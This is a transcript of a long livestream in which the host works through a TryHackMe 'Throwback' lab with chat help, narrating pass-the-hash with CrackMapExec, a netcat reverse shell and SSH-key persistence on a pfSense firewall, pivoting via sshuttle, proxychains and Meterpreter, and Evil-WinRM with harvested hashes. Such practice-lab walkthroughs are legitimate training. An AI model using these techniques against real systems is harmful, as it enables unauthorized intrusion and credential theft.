five hours and eight minutes. Good Lord. Looks like a thing for pip.
Is there a CrackMapExec like Docker thing? We spent so much time wasting our time trying to learn and get hashcat working. Now we've hit our next wall of getting CrackMapExec going. Reinstall it all over again. CrackMapExec. Docker. Is there a Docker? Oh, yeah. It's just, it's just Docker. Okay, it's just on Docker. It's just on Docker. Roger that. Can I just kind of like run that? Whoa, no. There goes Terminator again. We were doing so well. What's going on with my proxy now? Is the proxy server just gone? F. F, proxychains. Ping. It's doing it. I think, I think it's doing it. Cryillic, don't blame me for this. Cryillic is like, damn it, John. What did I do? Docker run this. This is, I was reaching for the Monsters. This is the empty can. Go back to my text message. Which is, you've been streaming for four hours. Yep. Are you actively streaming? Yeah, yeah, I'm actively streaming right now. It does it. Incredible. Docker is a thing. Have I taken a break yet? I mean, yeah, I've taken a break. I mean, it was just a couple of minutes. My bio break, as you guys were giving me flak for saying. So what do we got? We're gonna run SMB, that protocol. And I was reading about what it did. SMB. And then it's just gonna try and access or authenticate to different things with this. Five hour stream, two hours of hashcat on XPS. An hour and a half of hours recovering from terminated crashes. Look at the usage line. Oh yeah. Oh yeah. On this page it's like, boom, this is everything you can do. Let's see what we got. We need to know a user though, don't we? I mean, oh, oh, I understand. Okay, so as a user that we know, we could see where we can access it with this pass-the-hash technique. So if I run this, can I specify smb 2224 slash zero slash 24 with the user of the hashes that I totally should have saved? God dang it. Yeah, if it's referred to as CME, I'll repeat it, I'll start saying CME. Okay, I need to get these credentials back.
I totally should have saved these. Administrator is NTLM hash. Administrator, NTLM hash, this guy. And Blair J's hash was here, right? I think, yeah, I think let's use Blair J, the domain of throwback, and then the hash should be that hash. Does it do it? Will it do it? It looks like it's running. Should I be doing this with the administrator one though? Oh, I probably need to proxychain this. Shoot, can I do that with a Docker container? Is that gonna be weird? Oh, no, yeah, you're right. I know, I need the proxy. Can I do that? Okay, it just does it, I guess. Thank you, Krillix. Should I be like seeing output though? Like, should it be trying to tell me what it's doing? First time use detected. You're gonna see that every single time, but you're trapped in a Docker container. My reaction is priceless. I'm glad, I'm happy that I can at least try and keep you guys entertained doing this. Doing all this nonsense. Can I get a sanity check? Should I be seeing output? To continue on, you can either use a hash, this for me, let me catch the crack. Oh, thank you. Thank you, chat. No, you're right. Did I bind the ports in docker run to my proxy? Gosh, using this thing through Docker is just gonna suck. Why the heck won't it install?

Thank you, Emishari. I appreciate all the kind words. Yeah, yeah, man, absolutely. It's fun for me too. Let's get back to CrackMap, CME. Let's get back to CME and try to install it properly. Yeah, I mean, I guess I can just use the 1080, but -p 1080:1080? Will that know how to do it? I'll just let that go. Oh, oh shoot, wait. Oh, I should put the, sorry, you probably can't see that. I should put the -p after the image name or before the image name, sorry, with docker run. And I'll just press the I-believe button, try giving it the IP address of a known host to make it easier instead of scanning the whole network. Can I just like just do a sanity check? Be like, hey, yo, find this on 219. But that should see it.
Like that should get a result, I think, because the, okay. 10, 224, 219. Did you die on me again? Did the network just give up on me again? Is that why it failed? Is that why I was not getting any output? The solution, the answer, the problem is that I suck. Oh, okay. You know, at least we have learned that apparently Terminator crashes and it just can't, when the network gives up, it's so funny. Okay. Do I have, okay, good. I was worried, I was a little worried. I was like, am I not connected? What happened? Someone said a timer for John. Oh, yeah. Please, dear God, proxychains, work with a machine that actually responds. That got a hit. I don't understand. Does this, that output means that it got something, right? It looked like you're not stuck in your Docker container. Now, okay, thank you. I appreciate the chat. The chat's helped me like, look, now that we've got our sanity check, let's go for the whole network and see what we can whack.

Let's see if we get any output, any sane output with proxychains, or if it's just gonna like chill my terminal. You know when your like terminal cursor stops blinking and you're like terrified, like, what happened? Why did you stop? Are you still alive? And then if you like whack enter and your terminal does nothing, you're like, no, not now. It's gonna take a long time. Oh no. I wanna at least see output from proxychains. Do I need like -v? I think proxychains like can specify its verbosity, right? Thanks for everybody helping me learn. Oh, proxychains not being, yeah, that's the thing. Like proxychains should be verbose, right? I can amp him up, can I not? There's a setting, like there's a proxychains. Yeah, yeah, okay. Chat's saying like, dude, you really gotta try sshuttle. Let me do it. Verbose, verbose, verbose. There's gotta be, oh, okay, I just closed that tab like an idiot, so. There's gotta be a thing. Isn't there a debug? I think there's literally a proxychains like debug output.
I think it's, yeah, it's verbose by default. It's supposed to be. Yeah, yeah, yeah, you're right. Okay, here we go. sshuttle, shuttle, shuttle. I just typed in not the right word. Is it like --verbose? I don't know. Let's get sshuttle going on. Is that a, it might be in the repositories. Let's go for sshuttle. If we go for sshuttle, doesn't that mean, no, I don't find Pocket useful whatsoever. I haven't turned it off, I'm not Firefox. I literally, it probably just shows like, it's stupid, bad, inappropriate things. If we have sshuttle, we should get back on the, yeah, well that actually installed properly. Incredible, so. At some point you're going into proxychains, but for now sshuttle will only work on the firewall. Yeah, I was about to say, we got to get back on that firewall. So I need that shell back. And I didn't do anything to like, give myself persistence on that. So let's redo all of the work that we did earlier.

Admin, pfSense. At least I remember this. At least I know how to do this now. Famous last words. Opt, PMP, netcat, reverse shell. It's this command that I need to massage. Just a quick second. Can I just SSH into the firewall? Do I know a regular user on the firewall? I'm trying to remember. I thought I just, it was just root. It was just root on that, I think. Does there admin? Why does your cat look fancy? I'm using bat, which is a nice little shell extension. Can I SSH into that? As those admin credentials, is it that easy? Part of me feels like it's not. Let me find out. No, what? I can't SSH into that whatsoever, apparently. netcat -lnvp 4444. Oh, I entered the wrong IP address. I need my IP address. So, IP, hey, terminal, get out of here. ip a s tun0. I should really remember this. 50, 22, five. Whack. Can I add a user? Yeah, that's fine, dude. Yeah, that's fine. That's fine. Yeah, use password-based authentication. No, don't use an empty password. No, don't use a random password. Give me any password. Literally anything. No, yes.
No. Okay, can I SSH as John into that firewall now? Oh, hello. No, it needs a public key. So, sorry, home, John. mkdir .ssh. And let's do, let's get into CTF, TryHackMe, cd throwback, hosts, foo, and ssh-keygen, just to make a stupid poopy SSH key. Slap that bad boy, add in id_rsa.pub, and let's use an actual /bin/cat for that so I can copy that real, real easy. Great. And now let's cd .ssh and let's echo, crap, that into authorized_keys. Okay, now can I ssh -i id_rsa into John at that IP address? That's not an IP address. That is very far from an IP address. What's that? That guy, please, please? Yeah, okay, fantastic.

Now let's make bash setuid. Oh, I don't have bash, crap. cd /etc. Do I have a sudoers file? cat sudoers, no. Come on. cd /root, cd .ssh. Oh, he has authorized_keys. Nice, let's cat /home/john/.ssh/id_rsa and add it into our authorized_keys. Excuse me? Oh, crap, /home/john/.ssh/authorized_keys. Oh, thanks so much, boop, boop, I really appreciate that. I was just adding myself some keys. So I would hopefully be able to get back into this box when I inevitably break it, as I apparently tend to do. That should work now. So now can I SSH straight as root, please? Why? Can I specify usermod or anything? You know what, it literally doesn't matter. I mean, it does matter, but I'm just trying to figure this out. Yeah, I put the key in John's user. Try removing -i, did I? No, I'm in root's .ssh/authorized_keys. So when I added, sorry, cat authorized_keys, root should have a John id_rsa public key there. Looks like I just can't SSH as root. There is a pfSense setting to disable root login over SSH. That makes sense, you know? That probably is as expected. SSH server, enable secure shell. Is there a root setting anywhere? Probably not. That's fine. You know what, I don't need to waste this time, I guess. We should do some actual SSH stuff or actual sshuttle stuff, but I really, really just like this. How can I, OpenBSD, add sudoer?
Can I like make his user ID zero? Is that, well, not still work, but I know he has like obviously, obviously there's another root user that already has ID zero. So I probably just can't take that, but go to system user manager, is that right? System, user manager, admin, groups, settings. These are just for, if you try SSH, it may work because you're identifying by your public key, not the private key. I don't understand what you mean. Yeah, I don't understand how that would work if we aren't supplying the private key. Sorry, I'm just looking at the chat and trying to see what's up. I should not be fumbling around over this because it's just like, I hate that we don't have bash. I hate that sh can't be setuid. Like, I hate that it's OpenBSD. This literally doesn't matter. Let's just get sshuttle set up.

All right, what do we need to do? How do I use sshuttle? Where's a, where's Jazzimix or, yeah, Jaximus. Jaximus, I'm sorry. Yeah, I couldn't find sudoers unless it's like in a different location on OpenBSD. So for sshuttle, -r username@sshserver 0/0. So we've added our user in, how does this work? Do I, I need to use sshuttle on my attacker machine to SSH into the victim machine and get access to the server. You don't need to install sshuttle on the remote server. The remote server just needs to have. All right, so I mean, I did it. Yeah, does it have, does this thing have Python? Okay, we definitely have Python and I can tell because I just broke it. So we can SSH with John, which works. Let me see what Python looks like. Yeah, yeah, we got Python in here. Easy peasy. So let's sshuttle -r John at that IP address. And I want 10.200.24.0/24, right? And I can, oh, oh, this is asking for my local sudo. That's weird to me. Let's see if he does it, excuse me. They'll do establish SSH connection. I just, oh, oh, oh, I need to specify an id_rsa. Can I do that really easily like this?
Man, sshuttle with an id_rsa or private key? God damn it. sshuttle private key. There's gotta be a thing. Okay, you can specify your SSH command. Look at this. --ssh-cmd, ssh -i, that thing. Okay, so SSH that thing. No -i, but we'll specify an SSH command hyphen. Yeah, so ssh -i id_rsa. Connected. Okay. Now what? No, no, no. I mean, honestly, me trying to ignore it would present once again the exact same problem of CrackMapExec running in proxychains. Proxychains seems to be working just fine and I know we need to do it eventually again. Now I can connect to the network. So can this CrackMapExec now be able to reach all this stuff? Why did that instantly die? Yeah, let me try and ping that 219 buddy one more time. He's still good. So docker run with CrackMapExec SMB with that and a hash will give me like, sweet, we're cruising along, we're going, and then it'll just die. CrackMapExec is giving me a hard time. I will not deny that.

Can I get back to that install page? You should only install from source if you intend to hack on the source code or submit a PR. You should be using the binaries. Yeah, man. Yeah, I really, I really should be using the binaries. Where the, let me, let me get a God damn binary. If only I stink and read that. Ubuntu latest, please dear God. Okay, that downloaded. Let's get to my little opt directory. Let's get to CrackMap, crack. Oh, what the fuck? Let's move Downloads. CME, CME, yeah, put it in here and then let's unzip that cme-ubuntu. Good evening. How's it going? Thanks for coming to hang out. Yeah, replace everything. Why can't you release it? Move cme to cme2. Now I have chmod +x cme and I have CrackMapExec. Please for the love of God work. It's doing it. We got it. Ladies and gentlemen, we got them. Can I, I'm gonna try this proxychains. I'm just gonna do it. Give me just one sec. Let's do a little proxychains. Proxychains, proxychains. You can type CME, no, it was CrackMapExec, CME, and let's use this on 219.
Just to please verify that it works. What? Oh, is proxychains just dead now? Pretty sure proxychains is just dead. Let's get back to our msfconsole. It went, a lot of backtracing here. This is rough, guys. This is rough. Yeah, the joys of technology. Oh man, you don't even know. We've been doing this for what, almost six hours now? This is rough.

So set LHOST tun0, set LPORT 4141. So we set that binary to run, set payload to windows. Yeah, yeah, Meterpreter. Thanks so much for sticking with me, Rittenhouse. You're crazy, by the way. And let's get a reverse TCP. Let's run that guy. And our RDP session is gone, is gone. Okay, Peters J, and then it's throwback 317, right? Was that right? Yeah, okay. So let's get PowerShell going and let's zoom in on this guy. And we had the command runas /savecred. Oh shoot, extend the lab duration. Thank you, thank you, thank you. That's a very good call. Nope. Oh, that's probably why it's been dying, because I should, whatever. Now let's get that savecred. And user admin, Peters J, profile, cmd.exe. Good, now let's see two users. Peters J, Peters J. Wait, where did we, oh, we put it in Windows temp, didn't we? Yeah, that's where we put the met binary. So while we have our listener already rating and running, apparently that was weird. Oh no, this is Blair. It's not, I'm just gonna run it one more time. These are both coming from Blair from the workstation, but I want to be on production. Why is that not running? Why is that not running? Do I need to like kill those? Ah, ah, okay. There we go, number three. And then apparently workstation one is like really, really wanting to run this. All right. Yeah, I don't need all of these sessions of the workstation, guys, thanks. I really appreciate it, but it's just not necessary for me.

So use autoroute, thanks. Show options, set session to three and set subnet to 10.200.24.0/24. Perfect, do the thing. Okay, now use socks4a, search socks4a.
That sets up the SOCKS server. Good, so now we should be able to just run that. Good, okay. So 1080 is a thing and we should see this output, great. Okay, so that told me it's right, right? That told me it works. It was good. It said owned, it said pwned. So please for the love of God, do not destroy my terminal session and scan it all, please. Please. Okay, Krillix had said this might take a while. So some of these just aren't going to be real things, right? Cross your toes and fingers, chat, that was good. Yeah, some of these, now you would suggest hitting IP addresses directly. I don't know what you mean. I don't know the other IP addresses yet. Yeah, proxychains is going to make it hell, but I don't have the visibility on what other stuff is out there. Which I guess isn't a problem. Like I could do a ping scan or a ping sweep or something from another machine just to get an idea as to what's out there. But yeah, proxychains is going to make this unbearably slow.

Could have ARPed. What is that? What does that mean? Is that like a, yeah, I don't know. I mean, I agree with you. We'll have to specify with CrackMapExec, with CME, use a specific one. Oh, see the ARP cache. Can I do that with Meterpreter? ARP, Windows gather ARP scanner. Is that a thing? Yeah. Okay, CME, can you please stop? Show options, set session three. What? Oh, set RHOSTS 10, 224 slash zero, right? What does that do? That might help me find other machines, right? Yeah, yeah, yeah, yeah. Slower than proxychains. Is it, is it really? I guess I should have like set verbose on. I feel like it's cruising. I don't know if it's at 79. Yeah. All right, we're finding some new ones. We're finding some new ones. Let me note this down. With the Meterpreter ARP scanner, we found other internal IP addresses. Question is, if we're gonna be using CrackMapExec after this, what? Oh, and broadcast, sweet. Hell yeah, we did it. Yeah, yeah, yeah, that was awesome. That was a good call. Thanks, California.
Now we have a decent idea of some IP addresses. Oh yeah, true, true. We totally could have done that on the pfSense box. That's a good call. Can I just take a look at that to see if he's a thing? Nah, it's no worries. I don't, let me, you know what? Let me do it. Because he probably has that already saved, doesn't he? ARP table. If this page loads, right? That's actually, that's not a ton. So, that was a good move doing it through Meterpreter.

Okay, so now we have a list of IP addresses and we need to know some usernames. We only know Blair J and we only know Administrator as a hash. Do we have another? Do we have more? Can I run Seatbelt one more time? Or was it Mimikatz that we ran, wasn't it? I should save all this output. Like I should really save all this output. Taking all this and you can't have it. Excuse me, bring this all the way down here. Control-C that, slap all this code in. Okay, so now I have a Mimikatz log and we found admin Peters and their NTLM hash. We also found, oh, this is a crossup. Peters J, Peters J, his, his NTLM hash. Let's keep track of those. So for the PtH attack, we might very well have Peters J, Blair J, Peters J, Blair J, Administrator, those, what the heck? And are there others that I missed? Admin Peters J has a local, has a clear text password. SSHD, I saw, but is not extremely useful. I don't think, are there any others? Peters J, that's the same hash that I have, right? Yeah, good. I just wanna make sure I'm not crazy. Blair J, the same hash that I have. Okay, so Peters J and Blair J should be the ones that we find, is that right? Blair J and Peters J, B-L-A-I-R-E-J, P-E-T-E-R-S-J. That second one is not something that I know. Wait a second. WS01, I'm confused. Is it administrator, does that spell administrator? A-D-M-I-N-I-S-T-A. No, it's not enough characters for that. What other user might that be? Or like, I don't know what other user passwords, whatever, what other hashes I might have.
Like we have that big list of usernames and sure, it'd be kind of easy and stupid to throw something in, but like one, two, three. It's a nine character name, Humphrey J, or Horseman B. Yeah, how would we have found Humphrey J? Do you like loop this? Can you, I mean, obviously you can loop this. I don't honestly want to continue with that one because pfSense logs? What? Oh, oh, okay, yeah, you're right. That's the one from task 10. I'm sorry, I completely forgot. I guess when you do this for six hours, you kind of lose track. That, oh man, you're right, that makes sense.

All righty, time to do some BloodHound. Whoo, I haven't done BloodHound since the SANS Holiday Hack Challenge from like last year or something. Yeah, we'll see. ca, saying like, yeah, those are excuses. Yeah, dude, Krillix, thank you so much. I really appreciate you coming to hang out. This has been a blast for me. I will absolutely put this video on YouTube. I know it's gonna be a humongous, ginormous, awful, long video. I might tap out soon enough as well, but for now, I'm gonna keep drinking. We've got some time, maybe another hour, who knows, but thanks so much, Krillix. I'll see you soon. If we aren't done with this by the end of the night, we can certainly do more. I'll certainly be doing more tomorrow night and maybe Monday as well. So three-day weekend over in the U.S., good holiday stuff. Take care, buddy.

Okay, yeah, we got a stable foothold on throwback WS01. New team is in 4B, that is maybe best to enumerate what is on, oh yeah, Canada 2, excellent, awesome. As well as a new shell from passing the hash. We could do Evil-WinRM without, can't we? So Evil-WinRM on workstation one, which was 22. Evil-WinRM, -i, -u, Humphreys W. And his hash was on the firewall, this guy. Please work, maybe. Oh, no, no, no, that's gotta be a hash. Let me go, let me go. Oh gosh, this every time. Why is he, why is he doing that? Every time, why does Evil-WinRM just get stuck like this?
Am I just bad? I mean, I know I am, but 10.200.24.222. Humphreys W, is it Humphreys or Humphreys, Humphreys. What the heck? All right, we're just gonna copy and paste that one more time. Please connect. You have a hash. Do you need the, is that one, is Evil-WinRM a lowercase h? Have I consequently created accidentally three Evil-WinRM sessions that never needed to have anything? No, no, no, it's capital H. Lowercase is, yeah, yeah. Whatever, dude. Okay. Whatever. I guess Blair would be able to jump in, right? If Humphreys can't, we'll let that fade out and figure out, but we'll work with BloodHound, I guess. Is that username spelled right, Humphreys? No. Thanks, Rittenhouse. That'd be why. That would be why. Yep, you're totally right. Thank you. No, thanks. Turns out I'm fading out. Humphreys, oh my God. I'm fading out at two in the morning. This is real bad. At this point, it's like I should probably stop. Did I get anything wrong with that one? I'm trying to find where I screwed it up. I don't see it yet. How much do we have left? That's the real question, because if we're at six hours right now, we don't need to do a whole lot more. I'd like to still have something for the next video, or like doing this again, so. Yeah.

Let's put this away, because we've been going hard for six hours, and let's call it a night. It's two in the morning here on my side. I really, really hope you guys had fun. I know I had a blast, and I'm excited to do the rest of this. Thanks so much for hanging out with me on Twitch. Before you guys sign off, I have some good, fun stuff for you, for those of you that are hanging out in the chat. I'm gonna very, very quickly drop in a TryHackMe one month subscription code. A quick voucher. I really, really appreciate you guys hanging out, and I cannot say it enough. I'm super duper grateful. So let me sprinkle in one TryHackMe voucher in the chat real quick. I'm gonna let you guys race for it, if that's what you want.
Hopefully it'll be a copy and paste race. And I'm out of sync when I talk and what you guys see. So if you wanna trigger it real quick, whatever you need to do to get your TryHackMe code redeemed, I think it's good. What is it? Is it tryhackme.com? And then you go to your profile and there's like a redeem button, but thanks so much for watching, everybody. I really hope you enjoyed this. I'm gonna slap this in the chat right now, a TryHackMe voucher, one month voucher code. And three, two, one. I think I sent it. Yeah, yeah, I sent it. Waiting on Twitch to trigger and figure that out. But sweet. This has been a ginormous video and it's been a ton of fun, but very, very excited to keep doing this. And I'll see you guys soon. Thanks for hanging out. This has been an absolute blast. I love you and take care. Once I get back to OBS. Good night everybody. Love you.